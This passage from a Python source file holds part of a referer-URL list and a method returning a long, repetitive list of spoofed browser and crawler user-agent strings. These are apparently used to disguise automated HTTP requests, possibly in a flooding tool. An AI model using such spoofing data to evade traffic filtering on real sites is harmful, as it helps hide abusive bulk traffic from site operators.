'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=',
'http://www.google.com/?q=', 'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=',
'https://drive.google.com/viewerng/viewer?url=', 'http://www.google.com/translate?u=',
'https://developers.google.com/speed/pagespeed/insights/?url=',
'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=',
'https://add.my.yahoo.com/rss?url=', 'https://play.google.com/store/search?q=',
'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=']
return referers
def obtain_user_agents(self):
user_agents = ['Mozilla/5.0 (Amiga; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14',
'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en-US; rv:1.8.1.21) Gecko/20090303 SeaMonkey/1.1.15',
'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14',
'Mozilla/5.0 (Android 2.2; Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4',
'Mozilla/5.0 (BeOS; U; BeOS BeBox; fr; rv:1.9) Gecko/2008052906 BonEcho/2.0',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.1) Gecko/20061220 BonEcho/2.0.0.1',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.10) Gecko/20071128 BonEcho/2.0.0.10',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.17) Gecko/20080831 BonEcho/2.0.0.17',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.6) Gecko/20070731 BonEcho/2.0.0.6',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.7) Gecko/20070917 BonEcho/2.0.0.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
